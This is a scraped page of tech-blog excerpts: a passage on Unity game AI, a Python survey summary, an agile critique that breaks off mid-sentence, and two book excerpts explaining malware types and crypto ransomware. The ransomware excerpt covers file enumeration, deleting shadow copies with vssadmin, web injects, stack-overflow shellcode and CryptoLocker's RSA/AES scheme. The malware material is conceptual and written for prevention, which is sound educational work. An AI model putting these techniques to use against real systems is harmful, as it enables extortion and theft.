and then follow its connected node leading to the target waypoint. Most games use waypoints for pathfinding because they are simple and quite effective in terms of using less computation resources. However, they do have some issues. What if we want to update the obstacles in our map? We'll also have to place waypoints for the updated map again, as shown in the following figure: Having to manually alter waypoints every time the layout of your level changes can be cumbersome and very time-consuming. In addition, following each node to the target can mean that the AI character moves in a series of straight lines from node to node. Look at the preceding figures; it's quite likely that the AI character will collide with the wall where the path is close to the wall. If that happens, our AI will keep trying to go through the wall to reach the next target, but it won't be able to and will get stuck there. Even though we can smooth out the path by transforming it to a spline and doing some adjustments to avoid such obstacles, the problem is that the waypoints don't give us any information about the environment, other than the spline being connected between the two nodes. What if our smoothed and adjusted path passes the edge of a cliff or bridge? The new path might not be a safe path anymore. So, for our AI entities to be able to effectively traverse the whole level, we're going to need a tremendous number of waypoints, which will be really hard to implement and manage. This is a situation where a NavMesh makes the most sense. NavMesh is another graph structure that can be used to represent our world, similar to the way we did with our square tile-based grid or waypoints graph, as shown in the following diagram: A Navigation Mesh uses convex polygons to represent the areas in the map that an AI entity can travel to. The most important benefit of using a Navigation Mesh is that it gives a lot more information about the environment than a waypoint system. Now we can adjust our path safely because we know the safe region in which our AI entities can travel. Another advantage of using a Navigation Mesh is that we can use the same mesh for different types of AI entities. Different AI entities can have different properties such as size, speed, and movement abilities. A set of waypoints is tailored for humans; AI may not work nicely for flying creatures or AI-controlled vehicles. These might need different sets of waypoints. Using a Navigation Mesh can save a lot of time in such cases. Generating a Navigation Mesh programmatically based on a scene can be a somewhat complicated process. Fortunately, Unity 3.5 introduced a built-in Navigation Mesh generator as a pro-only feature, but is now included for free from the Unity 5 personal edition onwards. Unity's implementation provides a lot of additional functionality out of the box. Not just the generation of the NavMesh itself, but agent collision and pathfinding on the generated graph (via A*, of course) as well. Flocking and crowd dynamics In nature, we can observe what we refer to as flocking behavior in several species. Flocking simply refers to a group moving in unison. Schools of fish, flocks of sheep, and cicada swarms are fantastic examples of this behavior. Modeling this behavior using manual means, such as animation, can be very time-consuming and is not very dynamic. Similarly, crowds of humans, be it on foot or in vehicles, can be modeled by representing the entire crowd as an entity rather than trying to model each individual as its own agent. Each individual in the group only really needs to know where the group is heading and what their nearest neighbor is up to in order to function as part of the system. Behavior trees The behavior tree is another pattern used to represent and control the logic behind AI agents. Behavior trees have become popular for applications in AAA games such as Halo and Spore. Previously, we briefly covered FSMs. They provide a very simple yet efficient way to define the possible behaviors of an agent, based on the different states and transitions between them. However, FSMs are considered difficult to scale as they can get unwieldy fairly quickly and require a fair amount of manual setup. We need to add many states and hardwire many transitions in order to support all the scenarios we want our agent to consider. So, we need a more scalable approach when dealing with large problems. This is where behavior trees come in. Behavior trees are a collection of nodes organized in a hierarchical order, in which nodes are connected to parents rather than states connected to each other, resembling branches on a tree, hence the name. The basic elements of behavior trees are task nodes, whereas states are the main elements for FSMs. There are a few different tasks such as Sequence, Selector, and Parallel Decorator. It can be a bit daunting to track what they all do. The best way to understand this is to look at an example. Let's break the following transitions and states down into tasks, as shown in the following figure: Let's look at a Selector task for this behavior tree. Selector tasks are represented by a circle with a question mark inside. The selector will evaluate each child in order, from left to right. First, it'll choose to attack the player; if the Attack task returns a success, the Selector task is done and will go back to the parent node, if there is one. If the Attack task fails, it'll try the Chase task. If the Chase task fails, it'll try the Patrol task. The following figure shows the basic structure of this tree concept: Test is one of the tasks in the behavior tree. The following diagram shows the use of Sequence tasks, denoted by a rectangle with an arrow inside it. The root selector may choose the first Sequence action. This Sequence action's first task is to check whether the player character is close enough to attack. If this task succeeds, it'll proceed with the next task, which is to attack the player. If the Attack task also returns successfully, the whole sequence will return as a success, and the selector will be done with this behavior and will not continue with other Sequence tasks. If the proximity check task fails, the Sequence action will not proceed to the Attack task, and will return a failed status to the parent selector task. Then the selector will choose the next task in the sequence, Lost or Killed Player? The following figure demonstrates this sequence: The other two common components are parallel tasks and decorators. A parallel task will execute all of its child tasks at the same time, while the Sequence and Selector tasks only execute their child tasks one by one. Decorator is another type of task that has only one child. It can change the behavior of its own child's tasks including whether to run its child's task or not, how many times it should run, and so on. Thinking with fuzzy logic Finally, we arrive at fuzzy logic. Put simply, fuzzy logic refers to approximating outcomes as opposed to arriving at binary conclusions. We can use fuzzy logic and reasoning to add yet another layer of authenticity to our AI. Let's use a generic bad guy soldier in a first person shooter as our agent to illustrate this basic concept. Whether we are using a finite state machine or a behavior tree, our agent needs to make decisions. Should I move to state x, y, or z? Will this task return true or false? Without fuzzy logic, we'd look at a binary value (true or false, or 0 or 1) to determine the answers to those questions. For example, can our soldier see the player? That's a yes/no binary condition. However, if we abstract the decision-making process even further, we can make our soldier behave in much more interesting ways. Once we've determined that our soldier can see the player, the soldier can then "ask" itself whether it has enough ammo to kill the player, or enough health to survive being shot at, or whether there are other allies around it to assist in taking the player down. Suddenly, our AI becomes much more interesting, unpredictable, and more believable. This added layer of decision making is achieved by using fuzzy logic, which in the simplest terms, boils down to seemingly arbitrary or vague terminology that our wonderfully complex brains can easily assign meaning to, such as "hot" versus "warm" or "cool" versus "cold," converting this to a set of values that a computer can easily understand. Game AI and academic AI have different objectives. Academic AI researchers try to solve real-world problems and prove a theory without much limitation in terms of resources. Game AI focuses on building NPCs within limited resources that seem to be intelligent to the player. The objective of AI in games is to provide a challenging opponent that makes the game more fun to play. To summarize, we learned briefly about the different AI techniques that are widely used in games such as FSMs, sensor and input systems, flocking and crowd behaviors, path following and steering behaviors etc. If you enjoyed this excerpt, check out this book Unity 2017 Game AI Programming - Third Edition, to explore brand-new features in Unity 2017 for easier Artificial Intelligence implementation in your games. How to create non-player Characters (NPC) with Unity 2018 Put your game face on! Unity 2018.1 is now available Implementing lighting & camera effects in Unity 2018

0
0
8512

article-image-12-common-malware-types-you-should-know

Savia Lobo

24 May 2018

14 min read

12 common malware types you should know

Savia Lobo

24 May 2018

14 min read

A malware is a software with malicious intent that changes the system without the knowledge of the user. A malware uses the same technologies that are used by genuine software but the intent is bad. The following are some examples: Software such as TrueCrypt uses algorithms and techniques to encrypt a file to protect privacy, but, at the same time, ransomware uses same algorithms to encrypt files to extort the user. Similarly, Firefox uses HTTP protocol to browse the web while malware uses HTTP protocol to post its stolen data to its command and control (C&C) server In this article we will focus on the different types of malware. They can be categorized into different types based on the damage it causes to the system. It does not necessarily use a single method to cause damage; it can employ multiple ways. We will look into some known malware types: Backdoor Downloader Virus or file infector Worm Botnet Remote Access Tool (RAT) Hacktool Keylogger and password stealer Banking malware POS malware Ransomware Exploit and exploit kits To be clear, malware can act as a backdoor as well a password stealer or can be a combination of any of them. Some of the definitions are simple enough to understand in one line while others need some detailed explanation. This article is an excerpt taken from the book, 'Preventing Ransomware', written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan. Backdoor A backdoor can be a simple functionality for a malware. It opens a port on the victim machine so that the hacker can log in without the victim's knowledge and carry out their work. A piece of backdoor malware can create a new process of itself or inject malicious code that opens a port in legitimate code executing in the system. Backdoor activity was usually part of other malware. Most of the RAT tools have a backdoor module that opens a port on the victim machine for the hacker to get in. Downloader A downloader is a piece of malicious software that downloads other malware. It has a URL for the malware that needs to be downloaded. Hence, when executed, it downloads other malware. Bedep was mostly known to download CryptoLockers. Upatre was another popular downloader. Virus or file infector File infection malware piggybacks its code in clean software. It alters an executable file on a disk in such a way that malware code is executed before or after the clean code in the file is executed. A file infector is often termed a virus in the security industry. A lot of antivirus products tag it as a virus. In the context of PE executables of Windows, a file infector can work in the following manner: Malware adds malicious code at the end of a clean executable file. It changes the entry point of the file to point the malicious code located at the end. When the exe is double-clicked, the malware code is executed first. The malicious code keeps the address of the clean code which was earlier the entry point. After completing the malicious activity, the malware code transfers control to the clean code: A virus can infect a file in several ways. It can place its code at different places in the malicious code. File infection is a way to spread in the system. Many of these file infectors infect every system file on Windows. So malware code has to execute irrespective of whether you start Internet Explorer or a calculator program. Some very famous PE file infectors are Virut, Sality, XPAJ, and Xpiro. Worm A worm spreads in a system by various mechanisms. File infection can also be considered a worm-like behavior. A worm can spread in several ways: To other computers on the network by brute forcing default usernames and passwords of network shares or other machines. By exploiting the vulnerability in network protocols. Using pen drives. When an autorun worm is executed, it looks for a pen drive attached to a system. The worm creates a copy of itself in the pen drive and also adds an autorun.inf file to the pen drive. When an infected pen drive is inserted into a new machine, autorun.inf is executed by Windows, which in turn executes the copied .exe. The copied exe can now copy itself at different locations in the new machine where the pen drive is inserted. Botnet A botnet is a piece of malware that is based on the client-server model. The victim machine that is infected with the malware is called a bot. The hacker controls the bot by using a C&C server. This is also called a bot herder. A C&C server can issue commands to the bots. If a large number of computers are infected with bots, they can be used to direct a lot of traffic toward any server. If the server is not secure enough and is incapable of handling huge traffic, it can shut down. This is usually called a denial of service (DOS) attack. A bot can use internet protocols or custom protocols to communicate with its C&C server. ZeroAccess and GameOver are famous botnets of the recent past. Keylogger and password stealer Keyloggers have been well known for a long time. They can monitor keystrokes and log them to a file. The log file can be transferred to the hacker later on. A password stealer is a similar thing. It can steal usernames and passwords from the following locations: Browsers store passwords for social networking sites, movie sites, song sites, email, and gaming sites. FTP clients such as FileZilla and SmartFTP, which can be used in companies or individuals to save data in FTP servers. Email clients such as Thunderbird and Outlook are used to access emails easily. Database clients used mostly by engineers and students Banking applications Users store passwords in password managers so that they don't have to remember them. Malware can steal passwords from these applications. LastPass and KeePass are password manager applications. Hackers can use these credentials to steal more data or access the private information of somebody or to try to access military installations. They can target executives using this kind of malware to steal their confidential information. zeus and citadel are famous password stealers. Banking malware Banking malware is financial malware. It can include the functionality of keylogging and password-stealing from the browser. Banks have come up with virtual keyboards, which is a major blow to keyloggers. Now, most malware use a man-in-the-middle (MITM) attack. In this kind of attack, a piece of malware is able to intercept the conversation between the victim and the banking site. There are two popular MITM mechanisms used by banking malware these days: form grabbing and browser injects. In form grabbing, the malware hooks the browser APIs and sends the intercepted data to its C&C server. Simultaneously, it can send the same data to the bank website too. Web inject works in the following manner: Malware can perform API hooking in the browser to intercept the web page that as requested by the victim browser. An original web page is a form in which victim needs to input various things, such as the amount they need to transfer, credentials, and so on. The malware modifies extra fields in this intercepted web page to add some extra fields, such as CVV number, PIN, and OTP, which are used for additional authentication. These additional fields are injected using an HTML form. This form varies based on the bank. Malware keeps a configuration file which tells the malware which form needs to be injected in the page of which banking site. After modifying the web page, the malware sends data to the victim's browser. So the victim sees the page with extra fields as modified by the malware. Hence, the malware is able to steal the additional parameters needed for authentication. Tibna, Shifu, Carberp, and Zeus are some famous pieces of banking malware. POS malware The method of money transfer is changing. Cash transactions in shops are changing. POS devices are installed in a lot of shops these days. Windows has a Windows POS operating system for these kinds of POS devices. The POS software in these devices is able to read the credit card information when one swipes a card in the POS device. If malware infects a POS device, it scans the POS software for credit card patterns. Credit card numbers are 16 digits. Malware scans for 16-digit patterns in the memory to identify and then steal credit card numbers. BlackPOS, Dexter, JackPOS, and BackOff are famous pieces of POS malware. Hacktool Hacktools are often used to retrieve passwords from browsers, operating systems, or other applications. They can work by brute forcing or identifying patterns. Cain and Abel, John the Ripper, and Rainbow Crack were old hack tools. Mimikatz is one of the latest hack tools associated with some top ransomware such as Wannacry and NotPetya to decode and steal the credentials of the victim. RAT A RAT acts as a remote control, like the name suggests. It can be used for both good and bad intentions. RATs can be used by system administrators to solve the issues of their clients by accessing the client's machine remotely. But since RATS usually give full access to the person sitting remotely, they can be misused by hackers. RATs have been used in sophisticated hacks lots of times. They can be misused for multiple purposes, such as the following: Monitoring keystrokes using keyloggers Stealing credentials and data from the victim machine Wiping out all data from a remote machine Creating a backdoor so that a hacker can log in Gh0st Rat, Poison Ivy, Back Orifice, Prorat, and NjRat are well-known RATs. Exploit Software is written by humans and, obviously, there will be bugs. Hackers take advantage of some of these bugs to compromise a system in an unauthorized manner. We call such bugs vulnerabilities. Vulnerabilities occur due to various reasons, but mostly due to imperfect programming. If programmers have not considered certain scenarios while programming the software, this can lead to a vulnerability in the software. Here is a simple C program that uses the function sctrcpy() to copy a string from source to destination: The programmer has failed to notice that the size of the destination is 10 bytes and the source is 23 bytes. In the program, the source is allocated 23 bytes of memory while the destination is assigned 11 bytes of memory space. When the strcpy() function copies the source into the destination, the copied string goes beyond the allocated memory of the destination. The memory beyond the memory assigned to the destination can have important things related to the program which would be overwritten. This kind of vulnerability is called buffer overflow. Stack overflow and heap overflow are commonly known as buffer overflow vulnerability. There are other vulnerabilities, such as use-after-free when an object is used after it is freed (we don't want to go into this in depth as it requires an understanding of C++ programming concepts and assembly language). A program that takes advantage of these vulnerabilities for a malicious purpose is called an exploit. To explain an exploit, we will talk about a stack overflow case. Readers are recommended to read about C programs to understand this. Exploit writing is a more complex process which requires knowledge of assembly language, debuggers, and computer architecture. We will try to explain the concept as simply as possible. The following is a screenshot of a C program. Note that this is not a complete program and is only meant to illustrate the concept: The main() function takes input from the user (argv[1]) then passes it on to the vulnerable function vulnerable_function. The main function calls the vulnerable function. So after executing the vulnerable function, the CPU should come back to the main function (that is, line no 15). This is how the CPU should execute the program: line 14 | line 4 | line 5 | line 6 | line 15. Now, when the CPU is at line 6, how does it know that it has to return to line 15 after that? Well, the secret lies in the stack. Before getting into line 4 from line 14, the CPU saves the address of line 15 on the stack. We can call the address of line 15 the return address. The stack is also meant for storing local variables too. In this case, the buffer is a local variable in vulnerable_function. Here is what the stack should look like for the preceding program: This is the state of the stack when the CPU is executing the vulnerable_function code. We also see that return address (address of line 15) is placed on the stack. Now the size of the buffer is only 16 bytes (see the program). When the user provides an input(argv[1]) that is larger than 16 bytes, the extra length of the input will overwrite the return address when strcpy() is executed. This is a classic example of stack overflow. When talking about exploiting a similar program, the exploit will overwrite the RETURN ADDRESS. As a result, after executing line 6, the CPU will go to the address which has overwritten the return address. So now the user can create a specially crafted input (argv[1]) with a length greater than 16 bytes. The input contains three parts - address of the buffer, NOP, and shellcode. The address of the buffer is the virtual memory address of the variable buffer. NOP stands for no operation instruction. As the name implies, it does nothing when executed. Shellcode is nothing but an extremely small piece of code that can fit in a very small space. Shellcode is capable of doing the following: Opening a backdoor port in the vulnerable software Downloading another piece of malware Spawning a command prompt to the remote hacker, who can access the system of the victim Elevating the privileges of the victim so the hacker has access to more areas and functions in the system: The following image shows the same stack after the specially crafted input is provided as input to the program. Here, you can see return address is overwritten with the address of the buffer so, instead of line 15, the CPU will go to the address of the buffer. After this NOP, the shellcode will be executed: The final conclusion is, by providing an input to the vulnerable program, the exploit is able to execute shellcode which can open up a backdoor or download malware. The inputs can be as follows: An HTTP request is an input for a web server An HTML page is an input for a web browser A PDF is an input to Adobe Reader And so on - the list is infinite. You can explore these using the keywords provided as it cannot be explained in a few lines and goes beyond the scope of this book. We often see vulnerabilities mentioned in blogs. Usually, a CVE number is mentioned for a vulnerability. One can find the list of vulnerabilities at http://www.cvedetails.com/. The wannacry ransomware used CVE-2017-0144 . 2017 is the year when the vulnerability was discovered. 0144 denotes that this was the 144th vulnerability discovered in 2017. Microsoft also issues advisories for vulnerabilities in Microsoft software. https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144 gives the details of the vulnerability. The vulnerability description tells us that the bug lies in the SMBv1 server software installed in some of Microsoft operating system versions. Also, the URL can refer to some of the exploits. Now that you know what types of malware exist, do check out the book, Preventing Ransomware to further know about the techniques to prevent malware and perform effective malware analysis. IoT Forensics: Security in an always-connected world where things talk Top 5 penetration testing tools for ethical hackers Top 5 cloud security threats to look out for in 2018

0
0
4485

article-image-python-software-foundation-jetbrains-python-developer-survey

Aaron Lazar

24 May 2018

7 min read

What the Python Software Foundation & Jetbrains 2017 Python Developer Survey had to reveal

Aaron Lazar

24 May 2018

7 min read

Python Software Foundation together with Jetbrains conduct their developer survey every year and at the end of 2017, over 9,500 developers from all over the world participated in this insightful Python developer survey. The learnings are pretty interesting and so, I thought I’d quickly summarise the most relevant points here. So here we go. TL;DR: Adoption of Python 3 is growing rapidly, but 25% of developers are yet to migrate to Python 3 despite the closely looming deadline (1st of Jan, 2020). There are as many Python developers doing primarily data science as there are those focused on web development. This is quite different from the 2016 findings, where there was a difference of 17% between Web and Data. A majority of Python developers use JavaScript, HTML/CSS and SQL along with Python. Django, Pandas, NumPy and Matplotlib are the most popular python frameworks. Jupyter Notebook and Docker are the most popular technologies used along with Python. Among cloud platforms, AWS is the most popular. Both editions of PyCharm (Community and Professional) are the most popular tools for Python development, followed by SublimeText. Code autocompletion, code refactorings and writing unit tests are the most widely used features in Python. More than half the respondents had a full-time job, working on Python. A majority of respondents held the role of a Developer/Programmer and belonged to the age group 21-39. Most of the developers are located in the US, India and China. The above stats are quite interesting no doubt. This got me thinking about the why behind those numbers. Here’s my perspective on some of those findings. I would love to hear yours in the comments section below. How is Python being used? Starting with the usage of Python, the survey revealed that close to 80% of the respondents used Python as their primary language for development. When asked which languages they generally used it with, the top responses were JavaScript, HTML/CSS and SQL. On the other hand, a lot of Java developers and those using Bash/shell, seem to use Python as their secondary language. This shows that Python is quite interoperable with a number of other languages, making it versatile to use in web, enterprise and server side scripting. Now when it comes to what tasks Python is used for in day to day development, it wasn’t a surprise when respondents mentioned Data Analysis. More than 50% use Python as their primary language for data analysis, however, only 32% claimed that they used it for Machine Learning. On the other hand, 54% mentioned that they used it for web development. 36% responded that they used Python for DevOps and system administration purposes. This isn’t surprising as most developers tend to stick to a particular tool/stack as far as possible. Developers also responded that they used Python the most for Web Development, apart from anything else, with Machine Learning + Data Analysis close on its heels. Most DevOps and Sys admins use Python as their secondary language - that might be because shell/bash are their primary languages. In the 2016 survey, the percentage of web developers was much more than ML/Data Analysts, but the difference has reduced greatly. What roles do these developers hold? When asked what roles these developers hold, the responses were quite interesting! While nearly a quarter were in a combination of Data Analysis and Machine Learning roles, another quarter were in a combination of Data Analysis and Web Development! 15% claimed to be in Web Development and Machine Learning. This relationship, although quite unlikely, is extremely interesting and worth exploring further. One reason could be that developers are building machine learning solutions that are offered to customers as a web application, rather than as a desktop application. Another reason could also be that a lot of web apps these days are becoming more data driven and require some kind of machine learning components running under the hood. What version of Python are developers rolling with and what tools do they use it with? A very surprising fact that surfaced from the survey was that 25% of developers still haven’t migrated their codebases to Python 3 and are still working with Python 2. This is quite astonishing, since the support for Python 2 will be discontinued in less than two years (from Jan 1, 2020 to be precise). Although, the adoption for Python 3 has been growing steadily over the years, most of the developers who were still using Python 2 turned out to be web developers. This is so because data scientists might have moved into using Python quite recently, as compared to web developers who might have been using Python for a long time and hence, haven’t migrated their legacy code. What are their prefered tool set with Python? When asked about the tools that developers used, the web developers responded that a majority of them used Django(76%), while 53% used Requests and 49% used Flask. When it came to GUI frameworks, 9% of developers used PyQT / PyGTK / wxPython while 6% used TkInter. 29% of these developers mentioned that they used scientific libraries like NumPy / pandas / Matplotlib / scipy. This is quite supportive of the overlap between both the GUI development and Data Science roles. On the other hand, Data Scientists responded that 65% used NumPy / pandas / Matplotlib / scipy. 38% used Keras / Theano / TensorFlow / scikit-learn, while 31% and 27% used Django and Flask respectively. Django was a clear winner in the tools section, with an overall of 41% developers using it. When asked about what tools they used along with Python, the web developers responded that 47% used Docker, 46% used an ORM like SQLAlchemy, PonyORM, etc. and 40% used Redis. 27% of them used Jupyter Notebook. The Data Scientists on the other hand, used Jupyter Notebook a lot (52%). 40% of them used Anaconda and 23% Docker. Of the various cloud platforms, developers chose AWS the most (65%). When it came to Python features that were used the most, Code autocompletion (84%), code refactorings (82%) and writing unit tests (81%), made the top of the list. 75% developers used SQL databases while only 46% used NoSQL. Of the various IDEs and Editors, PyCharm in both its versions, community and professional, was the most popular, closely tailed by Sublime, Vim, IDLE, Atom, and VS Code. While Web Developers preferred PyCharm, data scientists prefer Jupyter Notebook. Developer Profile: Employment, Job Roles and Experience Unsurprisingly, 52% of Python developers claimed that they were in a full-time job. This ties in well with the 2018 StackOverflow Developer survey which labeled Python as the “most wanted” programming language. So developers out there, if you’re well versed with Python, you’re more likely to be hired. Talking about job roles, 73% held the role of a Developer/Programmer, while 19% held the role of a Data Analyst and 18% an Architect. Interestingly, 7% of them held the role of a CIO / CEO / CTO. In terms of years of experience, the results were well balanced with almost as many developers having more than 5 years of experience as those with less than 5 years of experience. 67% of the respondents were in the age group of 21-39, meaning that a majority of young folk seem to be using Python. If you’re one of them, and are looking to progress in your career, check out our extensive catalog of Python titles. As for geographic location of the developers, 18% were from the US while 13% were from India and 7% from China. Should you move to Python 3? 7 Python experts’ opinions Python experts talk Python on Twitter: Q&A Recap Introducing Dask: The library that makes scalable analytics in Python easier

0
2
5503

Savia Lobo

23 May 2018

7 min read

Anatomy of a Crypto Ransomware

Savia Lobo

23 May 2018

7 min read

Crypto ransomware is the worst threat at present. There are a lot of variants in crypto ransomware. Only some make it into the limelight, while others fade away. In this article, you will get to know about Crypto Ransomware and how one can code it easily in order to encrypt certain directories and important files. The reason for a possible increase in the use of crypto ransomware could be because coding it is quite easy compared to other malware. The malware just needs to browse through user directories to find relevant files that are likely to be personal and encrypt them. The malware author need not write complex code, such as writing hooks to steal data. Most crypto ransomwares don't care about hiding in the system, so most do not have rootkit components either. They only need to execute on the system once to encrypt all files. Some crypto ransomwares also check to see whether the system is already infected by other crypto ransomware. There is a huge list of crypto ransomware. Here are a few of them: Locky Cerber CryptoLocker Petya This article is an excerpt taken from the book, 'Preventing Ransomware' written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan. How does crypto ransomware work? Crypto ransomware technically does the following things: Finds files on the local system. On a Windows machine, it can use the FindFirstFile(), FindNextFile() APIs to enumerate files directories. A lot of ransomware also search for files present on shared drives It next checks for the file extension that it needs to encrypt. Most have a hardcoded list of file extensions that the ransomware should encrypt. Even if it encrypts executables, it should not encrypt any of the system executables. It makes sure that you should not be able to restore the files from backup by deleting the backup. Sometimes, this is done by using the vssadmin tool. A lot of crypto ransomwares use the vssadmin command, provided by Windows to delete shadow copies. Shadow copies are backups of files and volumes. The vssadmin (vss administration) tool is used to manage shadow copies. VSS in is the abbreviation of volume shadow copy also termed as Volume Snapshot Service. The following is a screenshot of the vssadmin tool: After encrypting the files ransomware leaves a note for the victim. It is often termed a ransom note and is a message from the ransomware to the victim. It usually informs the victim that the files on his system have been encrypted and to decrypt them, he needs to pay a ransom. The ransom note instructs the victim on how to pay the ransom. The ransomware uses a few cryptographic techniques to encrypt files, communicate with the C&C server, and so on. We will explain this in an example in the next section. But before that, it's important to take a look at the basics of cryptography. Overview of cryptography A lot of cryptographic algorithms are used by malware today. Cryptography is a huge subject in itself and this section just gives a brief overview of cryptography. Malware can use cryptography for the following purposes: To obfuscate its own code so that antivirus or security researchers cannot identify the actual code easily. To communicate with its own C&C server, sometimes to send hidden commands across the network and sometimes to infiltrate and steal data To encrypt the files on the victim machine A cryptographic system can have the following components: Plaintext Encryption key Ciphertext, which is the encrypted text Encryption algorithm, also called cipher Decryption algorithm There are two types of cryptographic algorithms based on the kind of key used: Symmetric Asymmetric A few assumptions before explaining the algorithm: the sender is the person who sends the data after encrypting it and the receiver is the person who decrypts the data with a key. Symmetric key In symmetric key encryption, the same key is used by both sender and receiver, which is also called the secret key. The sender uses the key to encrypt the data while the receiver uses the same key to decrypt. The following algorithms use a symmetric key: RC4 AES DES 3DES BlowFish Asymmetric key A symmetric key is simpler to implement but it faces the problem of exchanging the keys in a secure manner. A public or asymmetric key has overcome the problem of key exchange by using a pair of keys: public and private. A public key can be distributed in an unsecured manner, while the private key is always kept with the owner secretly. Any one of the keys can be used to encrypt and the other can be used to decrypt: Here, the most popular algorithms are: RSA Diffie Hellman ECC DSA Secure protocols such as SSH have been implemented using public keys. How does ransomware use cryptography? Crypto ransomware started with simple symmetric key cryptography. But soon, researchers could decode these keys easily. So, they started using an asymmetric key. Ransomware of the current generation has started using both symmetric and asymmetric keys in a smart manner. CryptoLocker is known to use both a symmetric key and an asymmetric key. Here is the encryption process used by CryptoLocker: When CryptoLocker infects a machine, it connects to its C&C and requests a public key. An RSA public and secret key pair is generated for that particular victim machine. The public key is sent to the victim machine but the secret key or private key is retained with the C&C server. The ransomware on the victim machine generates an AES symmetric key, which is used to encrypt files. After encrypting a file with AES key, CryptoLocker encrypts the AES key with the RSA public key obtained from C&C server. The encrypted AES key along with the encrypted file contents are written back to the original file in a specific format. So, in order to get the contents back, we need to decrypt the encrypted AES key, which can only be done using the private key present in the C&C server. This makes decryption close to impossible. Analyzing crypto ransomware The malware tools and concepts remain the same here too. Here are few observations while analyzing, specific to crypto ransomwares, that are different compared to other malware. Usually, crypto ransomware, if executed, does a large number of file modifications. You can see the changes in the filemon or procmon tools from Sysinternals File extensions are changed in a lot of cases. In this case, it is changed to .scl. The extension will vary with different crypto ransomware. A lot of the time, a file with a ransom note is present on the system. The following image shows a file with a ransom note: Ransom notes are different for different kinds of ransomware. Ransom notes can be in HTML, PDF, or text files. The ransom note's file usually has decrypt instructions in the filename. Prevention and removal techniques for crypto ransomware In this case, prevention is better than cure. It's hard to decrypt the encrypted files in most cases. Security vendors came up with decryption tool to decrypt the ransomware encrypted files. There was a large increase in the number of ransomware and an increase in complexity of the encryption algorithms used by them. Hence, the decryption tools created by the ransomware vendors failed to cope sometimes. http://www.thewindowsclub.com/list-ransomware-decryptor-tools gives you a list of tools meant to decrypt ransomware encrypted files. These tools may not work in all cases of ransomware encryption. If you've enjoyed reading this post, do check out 'Preventing Ransomware' to have an end-to-end knowledge of the trending malware in the tech industry at present. Top 5 cloud security threats to look out for in 2018 How cybersecurity can help us secure cyberspace Cryptojacking is a growing cybersecurity threat, report warns

0
0
6544

Aaron Lazar

23 May 2018

7 min read

Abandoning Agile

Aaron Lazar

23 May 2018

7 min read

“We’re Agile”. That’s the kind of phrase I would expect from a football team, a troupe of ballet dancers or maybe a martial artist. Everytime I hear it come from the mouth of a software professional, I go like “Oh boy, not again!”. So here I am to talk about something that might touch a nerve or two, of an Agile fan. I’m talking about whether you should be abandoning agile once and for all! Okay, so what is Agile? Agile software development is an approach to software development, where requirements and solutions evolve through a collaborative effort of self-organizing and cross-functional teams, as well as the end user. Agile advocates adaptive planning, evolutionary development, early delivery, and a continuous improvement. It also encourages a rapid and flexible response to change. The Agile Manifesto was created by some of the top software gurus on the likes of Uncle Bob, Martin Fowler, et al. The values that it stands for are: Individuals and interactions over processes and tools Working software over comprehensive documentation Customer collaboration over contract negotiation Responding to change over following a plan Apart from these, it follows 12 principles, as given here, through which it aims to improve software development. At its heart, it is a mindset. So what’s wrong? Honestly speaking, everything looks rosy from the outside until you’ve actually experienced it. Let me ask you at this point, and I’d love to hear your answers in the comments section below. Has there never been a time when you felt at least one of the 12 principles were a hindrance to your personal, as well as team’s development process? Well, if yes, you’re not alone. But before throwing the baby out with the bathwater, let’s try and understand a bit and see if there’s been some misinterpretation, which could be the actual culprit. Here are some common misinterpretations of what it is, what it can and cannot do. I like to call them: The 7 Deadly Sins #1 It changes processes One of the main myths about Agile is that it changes processes. It doesn't really change your processes, it changes your focus. If you’ve been having problems with your process and you feel Agile would be your knight in shining armor, think again. You need something more than just Agile and Lean. This is one of the primary reasons teams feel that Agile isn’t working for them - they’ve not understood whether they should have gone Agile or not. In other words, they don’t know why they went Agile in the first place! #2 Agile doesn’t work for large, remote teams The 4th point of the Agile manifesto states, “developers must work together daily throughout the project”. Have you ever thought about how “awesome aka impractical” it is to coordinate with teams in India, all the way from the US on a daily basis? The fact is that it’s not practically possible for such a thing to happen when teams are spread across time zones. What it intends is to have the entire team communicating with each other on a daily basis and there’s always the possibility of a Special Point of Contact to communicate and pass on the information to other team members. So no matter how large the team, if implemented in the right way, Agile works. Strong communication and documentation helps a great deal here. #3 Prefer the “move fast and break things” approach Well, personally I prefer to MFABT. Mostly because at work, I’m solely responsible for my own actions. What about when you’re part of a huge team that’s working on something together? When you take such an approach, there are always hidden costs of being 'wrong'. Moreover, what if everytime you moved fast, all you did was break things? Do you think your team’s morale would be uplifted? #4 Sprints are counterproductive People might argue that sprints are dumb and what’s the point of releasing software in bits and pieces? I think what you should actually think about is whether what you’re focusing on can actually be done quicker. Faster doesn’t apply to everything. Take making babies for example. Okay, jokes apart, you’ll realise you might often need to slow things down in order to go fast, so that you reach your goal without making mistakes. At least not too many costly ones anyway. Before you dive right into Agile, understand whether it will add value to what you do. #5 I love micromanagement Well, too bad for you dude, Agile actually promotes self-driven, self-managed and autonomous teams that are learning continuously to adapt and adjust. In enterprises where there is bureaucracy, it will not work. Bear in mind that most organizations (may be apart from startups) are hierarchical in nature which brings with bureaucracy in some form or flavor. #6 Scrum saves time Well, yes it does. Although if you’re a manager and think Scrum is going to cut you a couple of hours from paying attention to your individual team members, you’re wrong. The idea of Scrum is to identify where you’ve reached, what you need to do today and whether there’s anything that might get in the way of that. Scrum doesn’t cover for knowing your team members problems and helping them overcome them. #7 Test everything, everytime No no no no…. That’s a wrong notion, which in fact wastes a lot of time. What you should actually be doing is automated regression tests. No testing is bad too; you surely don’t want bad surprises before you release! Teams and organisations tend to get carried away by the Agile movement and try to imitate others without understanding whether what they’re doing is actually in conjunction with what the business needs. Now back to what I said at the beginning - when teams say they’re agile, half of them only think they are. It was built for the benefit of software teams all across the globe, and from what teams say, it does work wonders! Like any long term relationship, it takes conscious efforts and time everyday to make it work. Should you abandon Agile? Yes and no. If you happen to have the slightest hint that one or more of the following are true for your organisation, you really need to abandon Agile or it will backfire: Your team is not self-managed and lacks matured and cross-functional developers Your customers need you to take approvals at every release stage Not everyone in your organisation believes in Agile Your projects are not too complex Always remember, Agile is not a tool and if someone is trying to sell you a tool to help you become Agile, they’re looting you. It is a mindset; a family that trusts each other, and a team that communicates effectively to get things done. My suggestion is to go ahead and become agile, only if the whole family is for it and is willing to transform together. In other words, Agile is not a panacea for all development projects. Your choice of methodology will come down to what makes the best sense for your project, your team and your organization. Don’t be afraid to abandon agile in favor of new methodologies such as Chaos 